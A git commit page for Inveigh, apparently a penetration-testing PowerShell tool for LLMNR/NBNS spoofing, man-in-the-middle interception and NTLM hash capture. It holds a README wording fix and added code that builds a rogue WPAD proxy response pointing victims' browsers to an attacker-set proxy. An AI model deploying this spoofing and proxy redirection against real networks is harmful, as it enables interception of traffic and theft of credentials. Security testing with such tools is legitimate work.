diff options
| author | Kevin Robertson <robertsonk@gmail.com> | 2017-04-04 23:10:18 -0400 |
|---|---|---|
| committer | Kevin Robertson <robertsonk@gmail.com> | 2017-04-04 23:10:18 -0400 |
| commit | 0c7403d6be71de6ac007a523ab485408919ebb5b (patch) | |
| tree | 8a8be909d2f18d840df1cfdba9f26391ecd56c4f | |
| parent | 0e3560fc146882271e3e00bfa9c630fcae9f927f (diff) | |
| download | Inveigh-0c7403d6be71de6ac007a523ab485408919ebb5b.tar.gz Inveigh-0c7403d6be71de6ac007a523ab485408919ebb5b.zip | |
Last fixes
| -rw-r--r-- | README.md | 2 | ||||
| -rw-r--r-- | Scripts/Inveigh.ps1 | 10 |
2 files changed, 11 insertions, 1 deletions
@@ -20,7 +20,7 @@ Inveigh is a PowerShell LLMNR/mDNS/NBNS spoofer and man-in-the-middle tool desig ## Overview -At its core, Inveigh is a .NET packet sniffer that listens and responds to LLMNR/mDNS/NBNS requests while also capturing incoming NTLMv1/NTLMv2 authentication attempts over the Windows SMB service. The primary advantage of this packet sniffing method on Windows is that port conflicts with default running services are avoided. Inveigh’s HTTP/HTTPS/Proxy based features are not provided through the packet sniffer, they are provided through TCP listeners. Inveigh relies on creating multiple runspaces to load the sniffer, listeners, and control functions within a single shell and PowerShell process. +At its core, Inveigh is a .NET packet sniffer that listens for and responds to LLMNR/mDNS/NBNS requests while also capturing incoming NTLMv1/NTLMv2 authentication attempts over the Windows SMB service. The primary advantage of this packet sniffing method on Windows is that port conflicts with default running services are avoided. Inveigh’s HTTP/HTTPS/Proxy based features are not provided through the packet sniffer, they are provided through TCP listeners. Inveigh relies on creating multiple runspaces to load the sniffer, listeners, and control functions within a single shell and PowerShell process. ##### Inveigh running with elevated privilege  diff --git a/Scripts/Inveigh.ps1 b/Scripts/Inveigh.ps1 index c18f499..a8e6492 100644 --- a/Scripts/Inveigh.ps1 +++ b/Scripts/Inveigh.ps1 @@ -1093,6 +1093,16 @@ if($HTTP -eq 'Y' -or $HTTPS -eq 'Y') $inveigh.status_queue.Add("WPAD Response = Enabled") > $null $inveigh.status_queue.Add("WPAD = $WPADIP`:$WPADPort") > $null + if($WPADDirectHosts) + { + ForEach($WPAD_direct_host in $WPADDirectHosts) + { + $WPAD_direct_hosts_function += 'if (dnsDomainIs(host, "' + $WPAD_direct_host + '")) return "DIRECT";' + } + + $WPADResponse = "function FindProxyForURL(url,host){" + $WPAD_direct_hosts_function + "return `"PROXY " + $WPADIP + ":" + $WPADPort + "`";}" + $inveigh.status_queue.Add("WPAD Direct Hosts = " + ($WPADDirectHosts -join ",")) > $null + } else { $WPADResponse = "function FindProxyForURL(url,host){$WPAD_direct_hosts_function return `"PROXY $WPADIP`:$WPADPort; DIRECT`";}" |